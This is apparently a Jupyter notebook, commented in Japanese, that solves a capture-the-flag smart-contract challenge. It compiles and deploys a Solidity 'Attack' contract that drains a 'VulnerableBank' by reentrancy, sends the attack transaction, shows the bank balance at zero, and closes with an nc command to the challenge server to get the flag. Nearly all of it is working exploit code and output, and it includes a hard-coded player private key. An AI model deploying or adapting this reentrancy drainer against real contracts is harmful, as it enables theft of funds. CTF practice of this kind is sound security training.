# Sava_the_Kappa one-file exploit notebook


In [16]:
# 手入力で設定
RPC = "http://chal1.fwectf.com:8019/"  # 例: メニューのRPC endpoint
PRIV = "0x6dda95d8395b9cea896fab8a7a155a12e11f576f5c0b5c4de5249b56d3e7aa82"  # 例: メニューの Player PRIV
BANK = "0xa16E02E87b7454126E5E10d957A927A7F5B5d2be"  # 例: メニューの VulnerableBank アドレス

# 依存を最小限インストール（必要時のみ）
import sys, subprocess

def pip_install(pkgs):
    subprocess.run([sys.executable, "-m", "pip", "install", "--quiet", *pkgs], check=True)

try:
    import web3  # type: ignore
except Exception:
    pip_install(["web3", "eth_account"])  # 既成bytecode方式

from web3 import Web3
from eth_account import Account
w3 = Web3(Web3.HTTPProvider(RPC))
acct = Account.from_key(PRIV) if PRIV else None
print("Connected:", w3.is_connected())


Connected: True


In [17]:
# Attack.sol をノート内でコンパイルして ABI/bytecode を得る（py-solc-x使用）
import sys, subprocess

def pip_install(pkgs):
    subprocess.run([sys.executable, "-m", "pip", "install", "--quiet", *pkgs], check=True)

try:
    import solcx  # type: ignore
except Exception:
    pip_install(["py-solc-x"])  # 依存が無ければ導入
    import solcx  # type: ignore

# 必要なSolidityコンパイラを用意
try:
    solcx.set_solc_version("0.8.26")
except Exception:
    solcx.install_solc("0.8.26")
    solcx.set_solc_version("0.8.26")

ATTACK_SOURCE = r"""
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

interface IVulnerableBank {
    function deposit() external payable;
    function withdrawAll() external;
}

contract Attack {
    IVulnerableBank public bank;
    address public owner;
    uint256 public depositAmount;

    constructor(address _bank) payable {
        bank = IVulnerableBank(_bank);
        owner = msg.sender;
    }

    function pwn() external payable {
        require(msg.sender == owner, "not owner");
        require(msg.value > 0, "need value");
        depositAmount = msg.value;
        bank.deposit{value: msg.value}();
        bank.withdrawAll();
    }

    receive() external payable {
        uint256 bankBal = address(bank).balance;
        if (depositAmount > 0 && bankBal >= depositAmount) {
            bank.withdrawAll();
            return;
        }
        payable(owner).transfer(address(this).balance);
    }
}
"""

compiled = solcx.compile_source(
    ATTACK_SOURCE,
    output_values=["abi", "bin"],
    optimize=True,
)
attack_key = "<stdin>:Attack"
ATTACK_ABI = compiled[attack_key]["abi"]
ATTACK_BYTECODE = "0x" + compiled[attack_key]["bin"]

assert RPC and PRIV and BANK, "RPC/PRIV/BANK を設定してください。"


In [18]:
# デプロイ → 攻撃 → 検証
from web3 import Web3
from eth_account import Account

w3 = Web3(Web3.HTTPProvider(RPC))
acct = Account.from_key(PRIV)

# 1) デプロイ
Attack = w3.eth.contract(abi=ATTACK_ABI, bytecode=ATTACK_BYTECODE)
construct_tx = Attack.constructor(BANK).build_transaction({
    'from': acct.address,
    'nonce': w3.eth.get_transaction_count(acct.address),
    'gas': 2_500_000,
    'maxFeePerGas': w3.to_wei('1', 'gwei'),
    'maxPriorityFeePerGas': w3.to_wei('1', 'gwei'),
    'value': 0
})
signed = acct.sign_transaction(construct_tx)
create_hash = w3.eth.send_raw_transaction(signed.raw_transaction)
receipt = w3.eth.wait_for_transaction_receipt(create_hash)
attack_addr = receipt.contractAddress
print('Attack deployed at', attack_addr)

# 2) 攻撃（約0.1 ETHを送ってreentrancy）
attack = w3.eth.contract(address=attack_addr, abi=ATTACK_ABI)
call_tx = attack.functions.pwn().build_transaction({
    'from': acct.address,
    'nonce': w3.eth.get_transaction_count(acct.address),
    'gas': 25_000_000,
    'maxFeePerGas': w3.to_wei('1', 'gwei'),
    'maxPriorityFeePerGas': w3.to_wei('1', 'gwei'),
    'value': w3.to_wei('0.1', 'ether'),
})
signed2 = acct.sign_transaction(call_tx)
hash2 = w3.eth.send_raw_transaction(signed2.raw_transaction)
rcpt2 = w3.eth.wait_for_transaction_receipt(hash2)
print('attack tx status', rcpt2.status)

# 3) Bank残高確認
bank_bal = w3.eth.get_balance(BANK)
print('bank balance', bank_bal)


Attack deployed at 0x50B1682BE2321b59Bc87B92FA0D058833C01BaEf
attack tx status 1
bank balance 0


## 仕上げ（フラグ取得）
- `bank balance` が0なら、別ターミナルで以下を実行して `3` を選択:
```bash
nc chal1.fwectf.com 8020
# → 3 を入力（get flag）
```
- `fwectf{...}` が表示されます。
